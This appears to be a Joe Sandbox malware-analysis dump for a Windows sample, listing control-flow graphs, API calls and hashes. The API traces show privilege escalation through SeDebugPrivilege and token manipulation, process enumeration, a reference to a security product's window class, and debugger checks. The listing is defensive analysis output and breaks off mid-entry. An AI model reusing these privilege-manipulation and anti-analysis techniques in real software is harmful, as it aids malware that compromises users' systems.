                                          • Instruction Fuzzy Hash: 55118671544748BEE7118F78CC81B9ABBECEF057A4F10895DF599A72C1D2B5AD408B20

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 988 100078a8-100078bb 989 100078c4-100078ee call 1000c4a0 call 10007777 988->989 990 100078bd-100078bf 988->990 996 100078f0-100078fb call 100075d8 989->996 997 100078fd-10007901 989->997 991 10007a20-10007a24 990->991 996->997 1003 10007903-10007906 call 1000770d 996->1003 999 10007915-1000791b 997->999 1001 1000791d-10007929 call 100076d1 999->1001 1002 1000792f-10007935 999->1002 1001->1002 1016 1000792b 1001->1016 1005 10007937-10007945 call 100076d1 1002->1005 1006 1000795e-10007964 1002->1006 1013 1000790b-1000790d 1003->1013 1017 10007947-10007958 call 100076d1 1005->1017 1018 1000795a 1005->1018 1008 100079d0-100079d8 call 100075b7 1006->1008 1009 10007966-10007974 call 100076d1 1006->1009 1026 100079dd-10007a1e call 1000ac8b call 10007c48 1008->1026 1009->1008 1024 10007976-1000797f 1009->1024 1019 10007913 1013->1019 1020 1000790f 1013->1020 1016->1002 1017->1006 1017->1018 1018->1006 1019->999 1020->1019 1024->1008 1027 10007981-10007984 1024->1027 1026->991 1027->1008 1029 10007986-10007989 1027->1029 1029->1008 1031 1000798b-10007998 call 1000770d 1029->1031 1031->1008 1036 1000799a-100079a4 call 1000770d 1031->1036 1036->1008 1039 100079a6-100079b5 call 100076d1 1036->1039 1039->1008 1042 100079b7-100079ce 1039->1042 1042->1008 1042->1026
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2992649770.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10001000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_10001000_N6xnw0iEGs.jbxd
                                          Similarity
                                          • API ID: _memset
                                          • String ID:
                                          • API String ID: 2102423945-0
                                          • Opcode ID: c504ed737480372117f61c375401454e1a4cc081b0438ba395dd6110235c3eba
                                          • Instruction ID: d92c82a17bc2e3b55bf21d4e176e2411c74b9e9c773a553120c634e964016fd1
                                          • Opcode Fuzzy Hash: c504ed737480372117f61c375401454e1a4cc081b0438ba395dd6110235c3eba
                                          • Instruction Fuzzy Hash: 1A419435E0021F9BEB20DF68C88169D7BB1FF413E4F21416AE41DA7199D774AE85CB90

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 1043 1000b217-1000b228 call 1000b1ec ExitProcess
                                          APIs
                                          • ___crtCorExitProcess.LIBCMT ref: 1000B21F
                                            • Part of subcall function 1000B1EC: GetModuleHandleW.KERNEL32(100175B8,?,1000B224,1000E0E6,?,1000ACBA,000000FF,0000001E,00000001,00000000,00000000,?,1000F7D4,1000E0E6,00000001,1000E0E6), ref: 1000B1F6
                                            • Part of subcall function 1000B1EC: GetProcAddress.KERNEL32(00000000,100175A8), ref: 1000B206
                                          • ExitProcess.KERNEL32 ref: 1000B228
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2992649770.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10001000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_10001000_N6xnw0iEGs.jbxd
                                          Similarity
                                          • API ID: ExitProcess$AddressHandleModuleProc___crt
                                          • String ID:
                                          • API String ID: 2427264223-0
                                          • Opcode ID: 8be31fcdb33e2a27a179cff57672a67dc051748436262174480e8daa6fc77075
                                          • Instruction ID: 0c398691cb2c61e119b2037d3b9694a9f1a6bd54b2035d192df400d143da81c5
                                          • Opcode Fuzzy Hash: 8be31fcdb33e2a27a179cff57672a67dc051748436262174480e8daa6fc77075
                                          • Instruction Fuzzy Hash: A3B09231000108BBEB052F66CC0E88A3F2AFB823A0B508020F81809131DF72EE92DAC0

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 1046 100082d0-100082d7 1047 10008348 1046->1047 1048 100082d9-100082dd 1046->1048 1049 1000834d-1000834f 1047->1049 1048->1047 1050 100082df-100082f3 GetCurrentDirectoryA 1048->1050 1051 100082f6-100082fb 1050->1051 1051->1051 1052 100082fd-1000830b 1051->1052 1053 10008318-10008328 call 1000752c 1052->1053 1054 1000830d-10008310 1052->1054 1058 1000832a-1000832d 1053->1058 1059 1000832f-10008330 call 100078a8 1053->1059 1054->1053 1055 10008312 1054->1055 1055->1053 1058->1049 1061 10008335-10008346 1059->1061 1061->1049
                                          APIs
                                          • GetCurrentDirectoryA.KERNEL32(00000103,00000140,000000FE,?,10008E1B,?,00000004,10009892,?,?,00000334,10003B85,?), ref: 100082EB
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2992649770.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10001000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_10001000_N6xnw0iEGs.jbxd
                                          Similarity
                                          • API ID: CurrentDirectory
                                          • String ID:
                                          • API String ID: 1611563598-0
                                          • Opcode ID: 029ce26c42503f411c6da66abf63d6902ae0843b81772625349de17e0df78806
                                          • Instruction ID: 2bd18c3c5c48994b0759f2170f5e03fd91e5a32878fdb19b6ee32b226c9c7334
                                          • Opcode Fuzzy Hash: 029ce26c42503f411c6da66abf63d6902ae0843b81772625349de17e0df78806
                                          • Instruction Fuzzy Hash: EA01BC32500B46DAF721CA24C819BDA37E5FB81BE0F504139E6D98B2A6DB34EB49C754
                                          APIs
                                          • SetFilePointer.KERNEL32(FA83E855,00000000,00000000,00000002,1000778E,?,00000000,?,?,?,100078E5,?,00000140,00000000,00000000), ref: 10007604
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2992649770.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10001000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_10001000_N6xnw0iEGs.jbxd
                                          Similarity
                                          • API ID: FilePointer
                                          • String ID:
                                          • API String ID: 973152223-0
                                          • Opcode ID: 8cd482582f1ce7a99dd7b2103359b883ceae031772ed6ae8337ac228d584bfe8
                                          • Instruction ID: e16feed323ec4c7c274b6ef0c638263ac2504f4610d025434aa4a630ed971512
                                          • Opcode Fuzzy Hash: 8cd482582f1ce7a99dd7b2103359b883ceae031772ed6ae8337ac228d584bfe8
                                          • Instruction Fuzzy Hash: 6AF049B0C168D29EFB3CCB0C8814CA9AA95FB513D1B1784AAF40E5B019DA168D40DED0
                                          APIs
                                          • ReadFile.KERNEL32(FA83E855,?,00000001,00000001,00000000,?,?,1000784E,?,00000404,00000001,00000000,?,00000000), ref: 10007654
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2992649770.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10001000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_10001000_N6xnw0iEGs.jbxd
                                          Similarity
                                          • API ID: FileRead
                                          • String ID:
                                          • API String ID: 2738559852-0
                                          • Opcode ID: a22246be6a0a317918d3aec1459a55e227aa439c2a33235ff47fabf9bc56f2fd
                                          • Instruction ID: 328655b20b46c7854057dbc1cba60e0a6219c51e05292851d0bcd8ded7bd93b6
                                          • Opcode Fuzzy Hash: a22246be6a0a317918d3aec1459a55e227aa439c2a33235ff47fabf9bc56f2fd
                                          • Instruction Fuzzy Hash: EB01AD72600606AFE720CE19CC40A9ABBFAFB90284F018529F88AC6650D732FD55CB50
                                          APIs
                                          • __EH_prolog3.LIBCMT ref: 10008DE4
                                            • Part of subcall function 1000B4C8: _malloc.LIBCMT ref: 1000B4E2
                                            • Part of subcall function 1000B4C8: std::exception::exception.LIBCMT ref: 1000B517
                                            • Part of subcall function 1000B4C8: std::exception::exception.LIBCMT ref: 1000B531
                                            • Part of subcall function 1000B4C8: __CxxThrowException@8.LIBCMT ref: 1000B542
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2992649770.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10001000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_10001000_N6xnw0iEGs.jbxd
                                          Similarity
                                          • API ID: std::exception::exception$Exception@8H_prolog3Throw_malloc
                                          • String ID:
                                          • API String ID: 2311266369-0
                                          • Opcode ID: 3e26b86e5b1279afbabf400b168812a23bb727ffa361dbb07856a53d066e0e6f
                                          • Instruction ID: 74ea03d92b69d70e6f829631c4c0e15115dc5039482fcea8e7a8f5e451d479b6
                                          • Opcode Fuzzy Hash: 3e26b86e5b1279afbabf400b168812a23bb727ffa361dbb07856a53d066e0e6f
                                          • Instruction Fuzzy Hash: 5AF09035902A659AFB51DFA0D80675D3AA0FF00BF0F518604F8C8AF2DADBB09F408791
                                          APIs
                                          • _malloc.LIBCMT ref: 1000B4E2
                                            • Part of subcall function 1000AC8B: __FF_MSGBANNER.LIBCMT ref: 1000ACA4
                                            • Part of subcall function 1000AC8B: __NMSG_WRITE.LIBCMT ref: 1000ACAB
                                            • Part of subcall function 1000AC8B: RtlAllocateHeap.NTDLL(00000000,00000001,00000001), ref: 1000ACD0
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2992649770.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10001000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_10001000_N6xnw0iEGs.jbxd
                                          Similarity
                                          • API ID: AllocateHeap_malloc
                                          • String ID:
                                          • API String ID: 501242067-0
                                          • Opcode ID: a523410b075b2e507e2f936f435e68be10a21365df9e364fe8a36f9bc3a6ea08
                                          • Instruction ID: af73953911b8e8f7bba65e66bbeb0c349d045db87309e00b0f615e81207c2e39
                                          • Opcode Fuzzy Hash: a523410b075b2e507e2f936f435e68be10a21365df9e364fe8a36f9bc3a6ea08
                                          • Instruction Fuzzy Hash: 34C02221004A08233630A81A980682A3B8CC7C24E07610010EC040208BDC50ED1280E1
                                          APIs
                                          • _doexit.LIBCMT ref: 1000B47B
                                            • Part of subcall function 1000B32F: __lock.LIBCMT ref: 1000B33D
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2992649770.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10001000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_10001000_N6xnw0iEGs.jbxd
                                          Similarity
                                          • API ID: __lock_doexit
                                          • String ID:
                                          • API String ID: 368792745-0
                                          • Opcode ID: b7f9ddcf0c01e83a82a0f1c6c29853ea6c7db7599a0eb0d3eddd439c3244ce42
                                          • Instruction ID: 3811ae51bb16a7fbefe7461ba190c25b745f10d60d0fc6846b8c26432b0ebc89
                                          • Opcode Fuzzy Hash: b7f9ddcf0c01e83a82a0f1c6c29853ea6c7db7599a0eb0d3eddd439c3244ce42
                                          • Instruction Fuzzy Hash: 6DB0123258030C33EA201E42EC03F163F1DC7C0BA0F740020FA0C1D2E1A9A3BA6190C9
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2992649770.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10001000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_10001000_N6xnw0iEGs.jbxd
                                          Similarity
                                          • API ID: _calloc
                                          • String ID:
                                          • API String ID: 1679841372-0
                                          • Opcode ID: 6fbe30c6f210a50f799fcab12581603f26f4a8b3ac0063225e078c4a9166d02b
                                          • Instruction ID: c8d80f786f7d054e37de60efd03ea03daa2671600acf41333a91e997b5ba6f52
                                          • Opcode Fuzzy Hash: 6fbe30c6f210a50f799fcab12581603f26f4a8b3ac0063225e078c4a9166d02b
                                          • Instruction Fuzzy Hash: 3FB0123300C30D7FAF055E81FC038593BEDEB40574B20401AF91C050616E33B530564C
                                          APIs
                                            • Part of subcall function 10001772: GetCurrentProcess.KERNEL32(00000028,?), ref: 10001788
                                            • Part of subcall function 10001772: OpenProcessToken.ADVAPI32(00000000), ref: 1000178F
                                            • Part of subcall function 100017FE: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 10001821
                                            • Part of subcall function 100017FE: _memset.LIBCMT ref: 10001836
                                            • Part of subcall function 100017FE: Process32FirstW.KERNEL32(00000000,?), ref: 10001850
                                            • Part of subcall function 100017FE: CloseHandle.KERNEL32(00000000), ref: 1000188A
                                          • OpenProcess.KERNEL32(00001000,00000000,00000000), ref: 1000192D
                                          • OpenProcessToken.ADVAPI32(?,000F01FF,?), ref: 10001947
                                          • CloseHandle.KERNEL32(?), ref: 10001954
                                          • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000010,00000000,00000000), ref: 1000198A
                                          • OpenProcess.KERNEL32(00001000,00000000,00000000), ref: 10001BCD
                                          • OpenProcessToken.ADVAPI32(?,000F01FF,?), ref: 10001BEB
                                          • CloseHandle.KERNEL32(?), ref: 10001BF8
                                          • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000010,00000000,00000000), ref: 10001C31
                                          • GetLengthSid.ADVAPI32(?), ref: 10001E1D
                                          • SetTokenInformation.ADVAPI32(?,00000019,?,-00000008), ref: 10001E30
                                          • OpenProcess.KERNEL32(00001000,00000000,00000000), ref: 10001E65
                                          • OpenProcessToken.ADVAPI32(?,000F01FF,?), ref: 10001E83
                                          • CloseHandle.KERNEL32(?), ref: 10001E90
                                          • GetLengthSid.ADVAPI32(?), ref: 100020B5
                                          • SetTokenInformation.ADVAPI32(?,00000019,?,-00000008), ref: 100020C8
                                          • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000010,00000000,00000000), ref: 10002161
                                          • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000010,00000000,00000000), ref: 10001EC9
                                            • Part of subcall function 100018A0: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000010,00000000,00000000), ref: 100018D8
                                          • OpenProcess.KERNEL32(00001000,00000000,00000000), ref: 100020FD
                                          • OpenProcessToken.ADVAPI32(?,000F01FF,?), ref: 1000211B
                                          • CloseHandle.KERNEL32(?), ref: 10002128
                                          • GetLengthSid.ADVAPI32(?), ref: 1000234D
                                          • SetTokenInformation.ADVAPI32(?,00000019,?,-00000008), ref: 10002360
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2992649770.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10001000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_10001000_N6xnw0iEGs.jbxd
                                          Similarity
                                          • API ID: Token$Process$Open$AdjustCloseHandlePrivileges$InformationLength$CreateCurrentFirstProcess32SnapshotToolhelp32_memset
                                          • String ID: $ $0SafeMonClass$SeDebugPrivilege
                                          • API String ID: 2960649016-366188185
                                          • Opcode ID: 60c0450e047e00c070692f6269e6c6ad3fa1c72c5e658460400b88cfb3fad4ca
                                          • Instruction ID: 253941792478b7e33a101aa4b16c8ff9649bddfa32550c9372af5835deac56ed
                                          • Opcode Fuzzy Hash: 60c0450e047e00c070692f6269e6c6ad3fa1c72c5e658460400b88cfb3fad4ca
                                          • Instruction Fuzzy Hash: CE721776E0110EBBEB04DBA4DD80DEEB7BEEF48280B514026F615E7145DB34EA068B65
                                          APIs
                                          • VariantInit.OLEAUT32(?), ref: 04292E28
                                          • CoInitialize.OLE32(00000000), ref: 04292E2F
                                          • CoCreateInstance.COMBASE(1001BAA4,00000000,00000001,1001BA94,?), ref: 04292E51
                                          • SafeArrayAccessData.OLEAUT32(?,?), ref: 04292F0F
                                          • SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 04292F22
                                          • SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 04292F31
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2991710838.0000000004290000.00000040.00001000.00020000.00000000.sdmp, Offset: 04290000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_4290000_N6xnw0iEGs.jbxd
                                          Similarity
                                          • API ID: ArraySafe$Bound$AccessCreateDataInitInitializeInstanceVariant
                                          • String ID:
                                          • API String ID: 1776067534-0
                                          • Opcode ID: 79661aefa36f05e11d082444c745240cc05e8509a7cb606758af6a29bcda15af
                                          • Instruction ID: e8e9fe5afc06a4dd7378fcc5f0ff3195bb0e788fc53b29fd04b59d2f2c1e6333
                                          • Opcode Fuzzy Hash: 79661aefa36f05e11d082444c745240cc05e8509a7cb606758af6a29bcda15af
                                          • Instruction Fuzzy Hash: A1510A71A10619FFEF11DFA4C888AAEBBB9EF49704B104895FD15EB210D771E9058B60
                                          APIs
                                          • GetCurrentProcess.KERNEL32(00000028,?), ref: 10001788
                                          • OpenProcessToken.ADVAPI32(00000000), ref: 1000178F
                                          • LookupPrivilegeValueA.ADVAPI32(00000000,SeDebugPrivilege,?), ref: 100017A8
                                          • CloseHandle.KERNEL32(?), ref: 100017B5
                                          • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000010,00000000,00000000), ref: 100017E6
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2992649770.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10001000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_10001000_N6xnw0iEGs.jbxd
                                          Similarity
                                          • API ID: ProcessToken$AdjustCloseCurrentHandleLookupOpenPrivilegePrivilegesValue
                                          • String ID: SeDebugPrivilege
                                          • API String ID: 3038321057-2896544425
                                          • Opcode ID: f9a842ff66c4ec78a583601272a1e778934bfe3ea61c45c612d935d1b8297f68
                                          • Instruction ID: c94fb9c73ba85f91a1bf98ab1da07da24dcb44c607899cb9a50e2487d36010b3
                                          • Opcode Fuzzy Hash: f9a842ff66c4ec78a583601272a1e778934bfe3ea61c45c612d935d1b8297f68
                                          • Instruction Fuzzy Hash: 4A112970A04219EBFB01CFE1CC8ABEEBBB8FB08744F008419E605EB180D774E9459B60
                                          APIs
                                          • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 10001821
                                          • _memset.LIBCMT ref: 10001836
                                          • Process32FirstW.KERNEL32(00000000,?), ref: 10001850
                                          • lstrcmpiW.KERNEL32(?,?), ref: 10001865
                                          • Process32NextW.KERNEL32(00000000,0000022C), ref: 10001877
                                          • CloseHandle.KERNEL32(00000000), ref: 1000188A
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2992649770.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10001000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_10001000_N6xnw0iEGs.jbxd
                                          Similarity
                                          • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32_memsetlstrcmpi
                                          • String ID:
                                          • API String ID: 2129496168-0
                                          • Opcode ID: 2df0ab7da211292d62b89e19d4eeb0713746dd467ce8847cf4809c4c5c49a5c1
                                          • Instruction ID: 3ffd4d5cd6538f8ebec0314673e2b0490979e690ee2c66a7f099f0b82d5c42d3
                                          • Opcode Fuzzy Hash: 2df0ab7da211292d62b89e19d4eeb0713746dd467ce8847cf4809c4c5c49a5c1
                                          • Instruction Fuzzy Hash: 33110971A00218EBEB11DFA5DCC9AAEB7BCFB08684F1041A9E509D2150DB78EF44CB61
                                          APIs
                                          • IsDebuggerPresent.KERNEL32 ref: 0429C5D9
                                          • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0429C5EE
                                          • UnhandledExceptionFilter.KERNEL32(10017614), ref: 0429C5F9
                                          • GetCurrentProcess.KERNEL32(C0000409), ref: 0429C615
                                          • TerminateProcess.KERNEL32(00000000), ref: 0429C61C
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2991710838.0000000004290000.00000040.00001000.00020000.00000000.sdmp, Offset: 04290000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_4290000_N6xnw0iEGs.jbxd
                                          Similarity
                                          • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                          • String ID:
                                          • API String ID: 2579439406-0
                                          • Opcode ID: 0c6e12013528028966c606dde08bd82a8eb63e0bad2ee112bf7fee5026609698
                                          • Instruction ID: 30d28864d010911234fab82e94adc560adfa6405f757956dccb624c298f40f0a
                                          • Opcode Fuzzy Hash: 0c6e12013528028966c606dde08bd82a8eb63e0bad2ee112bf7fee5026609698
                                          • Instruction Fuzzy Hash: EB219EB4914364EFF751DF29CCC86547BBABB08314F60815AF90887672E7B1AA86CF05
                                          APIs
                                          • IsDebuggerPresent.KERNEL32 ref: 1000C5D5
                                          • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 1000C5EA
                                          • UnhandledExceptionFilter.KERNEL32(10017614), ref: 1000C5F5
                                          • GetCurrentProcess.KERNEL32(C0000409), ref: 1000C611
                                          • TerminateProcess.KERNEL32(00000000), ref: 1000C618
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2992649770.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10001000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_10001000_N6xnw0iEGs.jbxd
                                          Similarity
                                          • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                          • String ID:
                                          • API String ID: 2579439406-0
                                          • Opcode ID: 0c6e12013528028966c606dde08bd82a8eb63e0bad2ee112bf7fee5026609698
                                          • Instruction ID: c5e426f1109fde4803e617754598a24d866d1cc6d4e93cd83816215881de0859
                                          • Opcode Fuzzy Hash: 0c6e12013528028966c606dde08bd82a8eb63e0bad2ee112bf7fee5026609698
                                          • Instruction Fuzzy Hash: 5A21BBB8804364EBF741DF28CCC86547BAAFB08314F60811AF40897272E7719A86CB05
                                          APIs
                                          • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000010,00000000,00000000), ref: 042918DC
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2991710838.0000000004290000.00000040.00001000.00020000.00000000.sdmp, Offset: 04290000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_4290000_N6xnw0iEGs.jbxd
                                          Similarity
                                          • API ID: AdjustPrivilegesToken
                                          • String ID:
                                          • API String ID: 2874748243-0
                                          • Opcode ID: 0750d940eb4f66e49c8509644eb6e6eaf79ec723170f3abbc9985c62f060c6b7
                                          • Instruction ID: 1cabbbd2aaf9fcf9a39e6c8bcf54f02ceb56820f8e1e98abf05d8cbc3929b062
                                          • Opcode Fuzzy Hash: 0750d940eb4f66e49c8509644eb6e6eaf79ec723170f3abbc9985c62f060c6b7
                                          • Instruction Fuzzy Hash: B0F0ACB4A00209AFEB00DFA8C885ABEBBF9FB48304F418559E905DB251D7B0A9448B95
                                          APIs
                                          • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000010,00000000,00000000), ref: 100018D8
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2992649770.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10001000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_10001000_N6xnw0iEGs.jbxd
                                          Similarity
                                          • API ID: AdjustPrivilegesToken
                                          • String ID:
                                          • API String ID: 2874748243-0
                                          • Opcode ID: 0750d940eb4f66e49c8509644eb6e6eaf79ec723170f3abbc9985c62f060c6b7
                                          • Instruction ID: 040ad90355cb0a273dcfa4f8fbf83e3e1174ec4bc9b7d15bd186d8f56e51e7e8
                                          • Opcode Fuzzy Hash: 0750d940eb4f66e49c8509644eb6e6eaf79ec723170f3abbc9985c62f060c6b7
                                          • Instruction Fuzzy Hash: 5DF0C0B4A00209AFEB00DFA8C885EBFBBF9FF48304F408559E905DB351D7B0A9448B95
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2991710838.0000000004290000.00000040.00001000.00020000.00000000.sdmp, Offset: 04290000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_4290000_N6xnw0iEGs.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: f4c8aae7e42e3bcbbc9adda166d2297b63f01e91f4d3e5f47e8d5f8886ecb1be
                                          • Instruction ID: 4ddecf51d7f4dae417e2aeb364423fa30f2d3c50ac6e8174294d7bfbdba1d8fe
                                          • Opcode Fuzzy Hash: f4c8aae7e42e3bcbbc9adda166d2297b63f01e91f4d3e5f47e8d5f8886ecb1be
                                          • Instruction Fuzzy Hash: CBF1B275E102298FDF64CF28C890B9DB7F2BB89314F1581EAC94DA7245DA306E85CF91
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2992649770.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10001000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_10001000_N6xnw0iEGs.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: f4c8aae7e42e3bcbbc9adda166d2297b63f01e91f4d3e5f47e8d5f8886ecb1be
                                          • Instruction ID: ca287531272148182e2a4c1013a3c0c1369dd11ad5a7dfe37625cce3747b3fff
                                          • Opcode Fuzzy Hash: f4c8aae7e42e3bcbbc9adda166d2297b63f01e91f4d3e5f47e8d5f8886ecb1be
                                          • Instruction Fuzzy Hash: D4F1D275E042298FEB64CF28CC9079DB7B2FB49254F2581EAC84DA7245DB306E85CF91
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2991710838.0000000004290000.00000040.00001000.00020000.00000000.sdmp, Offset: 04290000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_4290000_N6xnw0iEGs.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 9bb5c1b61b7b98cbc056ea8f67b9a8ca7ef086e949689a6f228cbbfb2ff37ba7
                                          • Instruction ID: 65768bfb8588b811a1b104a459964e9a5de4afe061cb159aa080eba969b63ef1
                                          • Opcode Fuzzy Hash: 9bb5c1b61b7b98cbc056ea8f67b9a8ca7ef086e949689a6f228cbbfb2ff37ba7
                                          • Instruction Fuzzy Hash: 7C319A76A1874B8FCB10DF18C490A2AF3E4FF89318B09096DE99597312E374F955CB91
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2991710838.0000000004290000.00000040.00001000.00020000.00000000.sdmp, Offset: 04290000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_4290000_N6xnw0iEGs.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                          • Instruction ID: 82493402305385ee48b78e1c1b4595fb785bcf6e15bcd253b1326030e7b83d29
                                          • Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                          • Instruction Fuzzy Hash: 2811037737015343BE048A2EF8B42A6EFD6FBCA32072D526EC0854B25AD162B9419D08
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2992649770.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10001000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_10001000_N6xnw0iEGs.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                          • Instruction ID: 7803ec30f91b7029f58af8cd0b16b508c8908f2f84e137656bb773f65adef076
                                          • Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                          • Instruction Fuzzy Hash: 6F112B77640D8383F681CD2ED4B46ABE3DAEFC62E0B29437AD2824B65CD22299459600
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2991710838.0000000004290000.00000040.00001000.00020000.00000000.sdmp, Offset: 04290000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_4290000_N6xnw0iEGs.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: a8223c184387945c1fb1f8b9d386c8107abf76b8eb19074b24e68793b24c2442
                                          • Instruction ID: 2c5be4bc7837168567d82c04916c0aa00b56e3d7d0cc31ea53cc13564180b33c
                                          • Opcode Fuzzy Hash: a8223c184387945c1fb1f8b9d386c8107abf76b8eb19074b24e68793b24c2442
                                          • Instruction Fuzzy Hash: 7F21D5226B0EF206CB459FFCECC011727D18B8E11675DC3A6EAA4CE051C1BDE622C660
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2992649770.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10001000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_10001000_N6xnw0iEGs.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: a8223c184387945c1fb1f8b9d386c8107abf76b8eb19074b24e68793b24c2442
                                          • Instruction ID: 54eee8e86585e5215b5803947df559b0e46e26245c461bafb14746debafb24c4
                                          • Opcode Fuzzy Hash: a8223c184387945c1fb1f8b9d386c8107abf76b8eb19074b24e68793b24c2442
                                          • Instruction Fuzzy Hash: 5F21A122AB0EF206D7449BF8ECC011727D1CB8E11636DC366EAA4CD061C1BDD622C660
                                          APIs
                                          • _wprintf.LIBCMT ref: 10001192
                                          • RegSetValueExA.ADVAPI32(?,00000000,00000000,00000001,100195D4,0000000A), ref: 100011B0
